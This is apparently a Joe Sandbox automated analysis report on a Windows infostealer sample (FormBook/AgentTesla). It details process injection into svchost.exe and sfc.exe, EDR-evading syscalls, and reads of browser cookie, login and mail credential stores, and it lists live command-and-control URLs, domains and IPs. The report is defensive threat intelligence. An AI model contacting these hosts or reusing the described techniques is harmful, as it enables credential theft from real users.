            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtReadVirtualMemory: Direct from: 0x77752E8CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtCreateKey: Direct from: 0x77752C6CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtSetInformationThread: Direct from: 0x77752B4CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtQueryAttributesFile: Direct from: 0x77752E6CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtAllocateVirtualMemory: Direct from: 0x77753C9CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtClose: Direct from: 0x77752B6C
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtCreateMutant: Direct from: 0x777535CCJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtWriteVirtualMemory: Direct from: 0x77752E3CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtMapViewOfSection: Direct from: 0x77752D1CJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtResumeThread: Direct from: 0x777536ACJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtReadFile: Direct from: 0x77752ADCJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtQuerySystemInformation: Direct from: 0x77752DFCJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtDelayExecution: Direct from: 0x77752DDCJump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeNtAllocateVirtualMemory: Direct from: 0x77752BFCJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeThread register set: target process: 7616Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeThread APC queued: target process: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeJump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: BE1008Jump to behavior
            Source: C:\Users\user\Desktop\eoIIBcxUj3.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\eoIIBcxUj3.exe"Jump to behavior
            Source: C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UJarIfYl5U.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: eoIIBcxUj3.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: UJarIfYl5U.exe, 00000009.00000000.1476204422.0000000001330000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3669163459.0000000001331000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000000.1620139510.0000000001930000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
            Source: UJarIfYl5U.exe, 00000009.00000000.1476204422.0000000001330000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3669163459.0000000001331000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000000.1620139510.0000000001930000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: UJarIfYl5U.exe, 00000009.00000000.1476204422.0000000001330000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3669163459.0000000001331000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000000.1620139510.0000000001930000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: UJarIfYl5U.exe, 00000009.00000000.1476204422.0000000001330000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3669163459.0000000001331000.00000002.00000001.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000000.1620139510.0000000001930000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading
            412
            Process Injection
            2
            Virtualization/Sandbox Evasion
            1
            OS Credential Dumping
            211
            Security Software Discovery
            Remote Services1
            Email Collection
            3
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism
            412
            Process Injection
            LSASS Memory2
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Data from Local System
            4
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive4
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1653437 Sample: eoIIBcxUj3 Startdate: 01/04/2025 Architecture: WINDOWS Score: 100 28 www.l33900.xyz 2->28 30 www.031233226.xyz 2->30 32 12 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 3 other signatures 2->50 10 eoIIBcxUj3.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 UJarIfYl5U.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 sfc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 UJarIfYl5U.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.cruycq.info 47.83.1.90, 49732, 49733, 49734 VODANETInternationalIP-BackboneofVodafoneDE United States 22->34 36 www.milp.store 194.9.94.85, 80 LOOPIASE Sweden 22->36 38 4 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            eoIIBcxUj3.exe75%VirustotalBrowse
            eoIIBcxUj3.exe79%ReversingLabsWin32.Trojan.AgentTesla
            eoIIBcxUj3.exe100%AviraTR/AD.Swotter.hefoh
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.031233226.xyz/elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpk100%Avira URL Cloudmalware
            http://www.qzsazi.info/iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpk100%Avira URL Cloudmalware
            http://www.cruycq.info/0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpk100%Avira URL Cloudmalware
            http://www.sigaque.today/n61y/100%Avira URL Cloudmalware
            http://www.l33900.xyz100%Avira URL Cloudmalware
            http://www.l33900.xyz/gwiz/100%Avira URL Cloudmalware
            http://www.woodsplace.net/cu04/0%Avira URL Cloudsafe
            http://www.qzsazi.info/iwsk/100%Avira URL Cloudmalware
            https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/0%Avira URL Cloudsafe
            http://www.cruycq.info/0vwm/100%Avira URL Cloudmalware
            https://wx.longwaysun.com/app/register.php?site_id=20%Avira URL Cloudsafe
            http://www.woodsplace.net/cu04/?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk=0%Avira URL Cloudsafe
            http://www.l33900.xyz/gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk100%Avira URL Cloudmalware

            Download Network PCAP: filteredfull

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.l33900.xyz
            162.218.30.235
            truefalse
              high
              www.qzsazi.info
              47.83.1.90
              truefalse
                high
                woodsplace.net
                13.248.213.45
                truefalse
                  high
                  031233226.xyz
                  144.76.229.203
                  truefalse
                    high
                    www.sigaque.today
                    104.21.32.1
                    truefalse
                      high
                      www.milp.store
                      194.9.94.85
                      truefalse
                        unknown
                        www.cruycq.info
                        47.83.1.90
                        truefalse
                          unknown
                          www.woodsplace.net
                          unknown
                          unknownfalse
                            high
                            www.f66el619d.shop
                            unknown
                            unknownfalse
                              unknown
                              www.elevatetextiles.net
                              unknown
                              unknownfalse
                                high
                                www.vipstargold.buzz
                                unknown
                                unknownfalse
                                  high
                                  www.kitculture.shop
                                  unknown
                                  unknownfalse
                                    high
                                    www.031233226.xyz
                                    unknown
                                    unknownfalse
                                      high
                                      www.alplace.site
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.031233226.xyz/elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpkfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.cruycq.info/0vwm/false
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.woodsplace.net/cu04/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.cruycq.info/0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpkfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.l33900.xyz/gwiz/false
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.qzsazi.info/iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpkfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.qzsazi.info/iwsk/false
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.sigaque.today/n61y/false
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.l33900.xyz/gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpkfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://www.woodsplace.net/cu04/?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk=true
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://www.google.com/images/branding/product/ico/googleg_alldp.icosfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.ecosia.org/newtab/v20sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/chrome_newtabv20sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://wx.longwaysun.com/app/register.php?site_id=2239&topId=96442/gwiz/sfc.exe, 0000000A.00000002.3670715755.0000000005358000.00000004.10000000.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3670020187.00000000046E8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ac.ecosia.org?q=sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.l33900.xyzUJarIfYl5U.exe, 0000000B.00000002.3671463232.00000000057FE000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://gemini.google.com/app?q=sfc.exe, 0000000A.00000003.1736877391.0000000008278000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://wx.longwaysun.com/app/register.php?site_id=2sfc.exe, 0000000A.00000002.3670715755.0000000005358000.00000004.10000000.00040000.00000000.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3670020187.00000000046E8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            144.76.229.203
                                                            031233226.xyzGermany
                                                            24940HETZNER-ASDEfalse
                                                            13.248.213.45
                                                            woodsplace.netUnited States
                                                            16509AMAZON-02USfalse
                                                            194.9.94.85
                                                            www.milp.storeSweden
                                                            39570LOOPIASEfalse
                                                            47.83.1.90
                                                            www.qzsazi.infoUnited States
                                                            3209VODANETInternationalIP-BackboneofVodafoneDEfalse
                                                            104.21.32.1
                                                            www.sigaque.todayUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            162.218.30.235
                                                            www.l33900.xyzUnited States
                                                            62587ANT-CLOUDUSfalse
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1653437
                                                            Start date and time:2025-04-01 09:01:30 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 7m 22s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:14
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:eoIIBcxUj3.exe
                                                            (renamed file extension from none to exe, renamed because original name is a hash value)
                                                            Original Sample Name:c2c8b9851e807452f57cd7a1fabec3ba
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/5@24/6
                                                            Cookbook Comments:
                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 23.204.23.20, 204.79.197.222, 20.109.210.53
                                                            • Excluded domains from analysis (whitelisted): fp.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            TimeTypeDescription
                                                            03:03:40API Interceptor10402829x Sleep call for process: sfc.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            144.76.229.203March_00027290_7729.exeGet hashmaliciousFormBookBrowse
                                                            • www.031232899.xyz/do0s/
                                                            ORDER NO_PO-001839811401_MARCH_28_2025.exeGet hashmaliciousFormBookBrowse
                                                            • www.031232899.xyz/do0s/
                                                            ungziped_file.exeGet hashmaliciousFormBookBrowse
                                                            • www.031235246.xyz/an37/
                                                            SC-906-GVA DESHBANDHU.exeGet hashmaliciousFormBookBrowse
                                                            • www.031235045.xyz/tjx1/
                                                            mKv3sKQ5Q4E7waF.exeGet hashmaliciousFormBookBrowse
                                                            • www.031235045.xyz/tjx1/
                                                            34567898765.exeGet hashmaliciousFormBookBrowse
                                                            • www.031235064.xyz/8ijm/
                                                            Urgent Purchase Order.vbeGet hashmaliciousFormBookBrowse
                                                            • www.031235045.xyz/x35a/
                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                            • www.031235064.xyz/8ijm/
                                                            Quotation.exeGet hashmaliciousFormBookBrowse
                                                            • www.031235064.xyz/8ijm/
                                                            AAHiVVNIKQESryT.exeGet hashmaliciousFormBookBrowse
                                                            • www.031235045.xyz/tjx1/
                                                            13.248.213.45RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                            • www.mjmegartravel.online/t2sm/
                                                            na.docGet hashmaliciousFormBookBrowse
                                                            • www.thecareskin.com/btrd/?dnpxPL=MPO8Ot&NPY8=AbeIgGnzBU83HSXrQkpvN+QaXMHa/Smw3FQvIGYyvMJrWwYzMis5HD6DdthggtUmTF7mFQ==
                                                            firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                            • 13.248.213.45/
                                                            irlsever.docGet hashmaliciousFormBookBrowse
                                                            • www.microsofr.fun/omnp/
                                                            Wk8eTHnajw.elfGet hashmaliciousUnknownBrowse
                                                            • bizvegan.com/
                                                            Tenuto.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                                                            • www.osbornesargent.co.uk/md49/
                                                            194.9.94.85ZDQZvxRL2e.exeGet hashmaliciousFormBookBrowse
                                                            • www.milp.store/4wod/
                                                            viILoOTXYf.exeGet hashmaliciousFormBookBrowse
                                                            • www.milp.store/4wod/?Nz=tf9PV&qBo=fl5o+RjabZI4bDPOONv1k42Zlqc9nRFonSrjDDLfoFsWCi+K3/9NGbmUoc/k4l0ETdDL1GBm6/3eJIMTLCuCtP2xfyAY7zeiZfO2NGK1s/hQgU305XfS0Wg=
                                                            yloe82Jp1k.exeGet hashmaliciousFormBookBrowse
                                                            • www.milp.store/5okx/
                                                            g1V10ssekg.exeGet hashmaliciousFormBookBrowse
                                                            • www.milp.store/5okx/?UPV=rcIZgusooP3F15rLxZDud6xXj9GvmeIMDSMXn/eRfDMVJgFB6bjmi/bQhBXB6mE8kMRzhYMkKhir5mDouZLbZHEj7q5AS4j1BqPvDeLkw5rzdSCB0A==&YrV=FlsDgRMx
                                                            Solicitud de cotizacion.exeGet hashmaliciousFormBookBrowse
                                                            • www.milp.store/5okx/
                                                            44EgbQcEla.exeGet hashmaliciousFormBookBrowse
                                                            • www.milp.store/5okx/
                                                            99UbUXnwA9.exeGet hashmaliciousFormBookBrowse
                                                            • www.milp.store/5okx/
                                                            Curriculum Vitae.exeGet hashmaliciousFormBookBrowse
                                                            • www.milp.store/5okx/
                                                            PO-0005082025 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.milp.store/2j93/
                                                            PO-000172483 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.milp.store/2j93/
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.l33900.xyzsY8Sfsplzf.exeGet hashmaliciousFormBookBrowse
                                                            • 162.218.30.235
                                                            UhuGtHUgHf.exeGet hashmaliciousFormBookBrowse
                                                            • 162.218.30.235
                                                            yloe82Jp1k.exeGet hashmaliciousFormBookBrowse
                                                            • 162.218.30.235
                                                            g1V10ssekg.exeGet hashmaliciousFormBookBrowse
                                                            • 162.218.30.235
                                                            Solicitud de cotizacion.exeGet hashmaliciousFormBookBrowse
                                                            • 162.218.30.235
